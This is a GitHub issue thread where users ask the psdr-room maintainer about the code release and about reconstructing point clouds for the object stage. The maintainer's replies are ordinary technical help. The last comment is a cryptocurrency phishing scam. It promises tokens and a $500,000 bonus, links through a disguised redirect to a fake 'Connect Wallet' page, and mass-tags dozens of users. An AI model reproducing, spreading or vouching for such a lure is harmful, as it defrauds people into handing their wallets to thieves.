### ISSUE TITLE
Complete code

### ISSUE THREAD

**Issue by qijiyaolinZGH** [andyyankai/psdr-room#1]
When will the Complete code be released?

**Comment by andyyankai** [comment]
The expected code release is object stage and fine stage optimization.
The input for each stage can be generated from existing segmentation/clip search on model database, I might not put all the dependency (as well as the whole model database) since some part of the pipeline is not public available. But I will update some more instructions on the code later next month.

**Comment by pranavmalikk** [comment]
I'm still sorting out the model database, does the object stage include the room stage as well? Any chance this gets released?

**Comment by andyyankai** [comment]
I haven't release the room stage yet, might be after sig asia.

**Comment by qijiyaolinZGH** [comment]
When I was reproducing the object stage, I encountered the following issues: I reconstructed the point cloud using semantic and depth maps, and estimated the initial coordinates for each piece of furniture separately. However, the coordinates I estimated differ significantly from the ones you provided in "obj_stage_config.json". Here is the reconstructed point cloud I obtained. Could you help me analyze if I made a mistake in any step of the reproduction process?
<img width="746" alt="1" src="https://github.com/andyyankai/psdr-room/assets/56566853/70113e23-eb7d-495f-b66d-b5722b8398c8">
<img width="1014" alt="2" src="https://github.com/andyyankai/psdr-room/assets/56566853/512c758c-02d9-41e5-ae2a-90f65fb0406c">
<img width="566" alt="3" src="https://github.com/andyyankai/psdr-room/assets/56566853/5a3f710f-0dd2-46ab-a8a4-9b74c6925934">

**Comment by andyyankai** [comment]
I can send you the point cloud I predict to you about this weekend.

You might need to double check if your fov is correct while generate the pc. Also you might need to do a transform to the point cloud based on the camera to world or the angle of floor if I remember correctly.

**Comment by andyyankai** [comment]
I believe a transform based on the camera should be enough( from the output from perspective field, which is in a txt file includes camera fov/roll/pitch
 I will need to double check later. (on a trip for siggraph asia now)

**Comment by qijiyaolinZGH** [comment]
How do you normalize depth?Max-min normalization?

**Comment by qijiyaolinZGH** [comment]
Can you provide your code for generating the point cloud?

**Comment by andyyankai** [comment]
Sure I will update the code for depth and depth point cloud later.  The depth map is normalized with maximum depth as 1

 (btw open a new github issue for these question in case I missed)

**Comment by hfzi** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
yrjyrj123, @jobot0, @loureirorg, @danhnn, @chengang21, @physician, @tyao1, @JoukoSalonen, @XuyangSong, @nickname1234567891, @phreic, @larryliuqing, @ashwin9999, @TaiPhamD, @zs9024, @sooham, @dut3062796s, @jasquibb, @m-bo-one, @ZGQ-inc, @kenjichanhkg, @lfzm, @techping, @shalakhin, @RutZap, @kravenoff42, @jkariscodes, @nanbeiwei2014, @youcanya, @hyperji, @naftalimurgor, @vytk, @beastybryan, @edydkim, @RogerGold, @chimerin, @Kampoz18, @oeohomos, @EdwinCheruiyot, @sykwer, @thomasklemm, @jslauthor, @lonchak23, @cinquemb, @songwentong, @dsky1990, @VGCif, @DeflatedPickle, @xiaofei6677, @orhanalparslan
